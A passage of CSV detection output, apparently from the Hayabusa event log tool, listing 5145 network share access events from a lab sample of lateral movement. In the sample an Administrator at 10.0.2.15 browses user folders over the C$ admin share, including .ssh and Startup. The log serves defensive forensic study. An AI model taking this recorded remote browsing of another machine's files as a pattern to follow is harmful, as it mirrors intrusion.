Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games | 
IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\.ssh | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\New folder | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\IEUser\Desktop\RDPWrap-v1.6.2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\translations | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\db | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\garbage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64 | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\db | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\winrar-cve | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 